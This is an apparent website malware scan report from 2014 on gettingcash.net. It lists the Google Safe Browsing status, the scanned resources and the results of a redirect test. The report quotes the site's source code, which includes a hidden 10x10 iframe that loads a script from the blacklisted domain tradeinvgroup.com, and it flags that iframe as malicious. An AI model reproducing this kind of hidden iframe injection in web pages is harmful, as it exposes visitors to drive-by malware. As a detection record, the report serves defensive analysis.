Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gettingcash.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://gettingcash.net/ | 200 OK Content-Length: 12058 Content-Type: text/html | malicious |
Page code contains blacklisted domain: tradeinvgroup.com ...[4554 bytes skipped]... All Rights Reserved</span> <!-- Footer Text Goes Here End --> <!--encryptbegin--></td> </tr> </table></td> </tr> </table> </div> <!--encryptend--> <!-- Google Analytics Goes Here Start --> <!-- Google Analytics Goes Here End --> <!--encryptbegin--> <div style="visibility:hidden"><iframe src="http://tradeinvgroup.com/htdocs/test.php" width=10 height=10></iframe></div> </body> </html> <!--encryptend--> Malicious iFrame found. size: 10x10 src: http://tradeinvgroup.com/htdocs/test.php This URL is marked by Google as suspicious <iframe src="http://tradeinvgroup.com/htdocs/test.php" width=10 height=10> | ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21245 Content-Type: text/javascript | clean |
http://www.cbproads.com/adsense_scrollv3.js | 200 OK Content-Length: 3973 Content-Type: application/x-javascript | clean |
http://af.MillionaireMatch.com/_featured_banner.js?usr_id=3117250&option=pr | 200 OK Content-Length: 17775 Content-Type: text/html | clean |
http://af.MillionaireMatch.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Thu, 24 Jul 2014 00:01:25 GMT Location: http://www.MillionaireMatch.com/index.html Server: nginx/0.8.55 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.millionairematch.com/index.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 24 Jul 2014 00:01:25 GMT Location: http://www.MillionaireMatch.com Server: nginx/0.8.55 Content-Type: text/html; charset=utf-8 | clean |
http://www.millionairematch.com/ | 200 OK Content-Length: 29567 Content-Type: text/html | clean |
http://cdn.MillionaireMatch.com/jquery-1.4.2.min.js | 200 OK Content-Length: 72174 Content-Type: application/x-javascript | clean |
http://cdn.MillionaireMatch.com/jquery-plugins/jquery_plugins.js | 200 OK Content-Length: 41964 Content-Type: application/x-javascript | clean |
http://af.MillionaireMatch.com/_jslib.js | 200 OK Content-Length: 141552 Content-Type: application/x-javascript | clean |
http://af.MillionaireMatch.com/_country_tag.js?name=r_country&state_id=match_r_state_id&r_state= | 200 OK Content-Length: 6552 Content-Type: application/x-javascript | clean |
https://seal.verisign.com/getseal?host_name=www.millionairematch.com&size=XS&use_flash=NO&use_transparent=NO&lang=en | 200 OK Content-Length: 2270 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gettingcash.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 24 Jul 2014 00:01:19 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 12058
Content-Type: text/html
...12058 bytes of data.
GET / HTTP/1.1
Host: gettingcash.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 24 Jul 2014 00:01:19 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 12058
Content-Type: text/html
...12058 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: gettingcash.net
Referer: http://www.google.com/search?q=gettingcash.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gettingcash.net
Referer: http://www.google.com/search?q=gettingcash.net
Result:
The result is similar to the first query. There are no suspicious redirects found.